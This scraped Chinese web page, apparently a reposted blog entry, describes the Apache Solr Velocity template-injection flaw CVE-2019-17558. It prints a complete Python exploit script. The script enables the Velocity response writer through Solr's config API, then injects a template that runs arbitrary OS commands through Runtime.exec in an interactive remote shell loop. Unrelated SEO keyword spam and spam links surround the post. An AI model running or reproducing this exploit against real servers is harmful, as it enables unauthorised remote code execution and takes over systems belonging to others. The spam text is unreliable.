当前位置: 首页 > news >正文

手机 网站 开发做网站还是做微信公众号

手机 网站 开发,做网站还是做微信公众号,如何优化seo,wordpress页面都在右边漏洞描述 Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。Velocity是Apache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离(即MVC设计模式)。 Apa…

漏洞描述

        Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。Velocity是Apache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离(即MVC设计模式)。 Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞在Solr系统上执行任意代码。

执行漏洞py脚本,取得shell连接

F:\exphub-master\solr>python cve-2019-17558_cmd.py

EXP

#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author:zhzyker
# from:https://github.com/zhzyker/exphub
# telegram:t.me/zhzykerimport requests
import sys
import jsonif len(sys.argv)!=2:print('+------------------------------------------------------------+')print('+ DES: by zhzyker as https://github.com/zhzyker/exphub       +')print('+      Apache Solr Velocity Commons Remote Code Execution    +')print('+------------------------------------------------------------+')print('+ USE: python3 cve-2019-17558_cmd.py <url>                   +')print('+ EXP: python3 cve-2019-17558_cmd.py http://1.1.1.1:8983     +')print('+ VER: Apache Solr 5.0.0 - 8.3.1                             +')print('+------------------------------------------------------------+')sys.exit(0)url = sys.argv[1]core_url = url + "/solr/admin/cores?indexInfo=false&wt=json"
try:r = requests.request("GET", url=core_url, timeout=10)core_name = list(json.loads(r.text)["status"])[0]print ("[+] GET API: "+url+"/solr/"+core_name+"/config")
except:print ("[-] Target Not Vuln Good Luck")sys.exit(0)api_url = url + "/solr/" +core_name+ "/config"
headers = {"Content-Type": "application/json"}
set_api_data ="""
{"update-queryresponsewriter": {"startup": "lazy","name": "velocity","class": "solr.VelocityResponseWriter","template.base.dir": "","solr.resource.loader.enabled": "true","params.resource.loader.enabled": "true"}
}
"""
api = requests.request("POST", url=api_url, data=set_api_data, headers=headers)
code = str(api.status_code)
if api.status_code == 200:print ("[+] <HTTP" +code+ "> SET API Success")
else:print ("[-] <HTTP" +code+ "> SET API Failed Good Luck")sys.exit(0)def do_exp(cmd):vuln_url = url+"/solr/"+core_name+"/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27"+cmd+"%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"r = requests.request("GET", vuln_url)print (r.text)while 1:cmd = input("Shell >>> ")if cmd == "exit" : exit(0)do_exp(cmd)

http://www.yayakq.cn/news/844713/

相关文章:

  • 深圳服务网站入口上海建设网站哪家好
  • 广西冶金建设公司网站长沙企业网站seo
  • 湘潭网站建设企业东莞网站开发建设
  • 深圳企业网站建设维护安徽泗县建设银行网站
  • 网站蜘蛛爬行统计系统整人做我女朋友网站
  • 千海网站建设 小程序大连网站制作网站
  • 长春网站排名优化费用劳务工程信息平台
  • 培训机构网站建设要求兰州做网站 咨询兰州做网站公司
  • 平台建设上线网站中国陕西省住房城乡建设厅官网
  • 温江网站开发电子工程设计网站
  • 做棋牌网站wordpress友情链接图像地址
  • 漯河市住房建设局网站上海做网站 公司 哪家好
  • 自己做网站服务器可以吗北京北京网站建设
  • 网站权重分析邢台网站建设费用
  • 网站建设教程自学网松江品牌网站建设
  • 淄博网站建设网站推广优化常用的网页设计软件
  • 如何查看百度指数网站的seo是什么意思
  • 建设一个视频网站需要多少钱慢慢来 网站建设
  • 四川建设网站塔吊企业信用信息查询公示报告
  • 网站检测中心奉贤庄行网站建设
  • 阿里云网站备案后中盛腾龙建设工程有限公司网站
  • 住房与城乡建设部网站注册中心wordpress的搭建环境搭建
  • 网站和微信对接江苏建设信息电子证书
  • 网站建设公司经营泸州 网站建设
  • 常德网站建设阿里云虚拟主机多个网站
  • php做网站需要注意什么铜陵市网站建设
  • 徐州做网站管理的公司删除后台wordpress新闻
  • 网站开发常用jquery插件邢台网站建设网络优化
  • 厦门网站建设及维护国内购物网站案例分析
  • 网站核验为个人实际是公司广东省有多少个市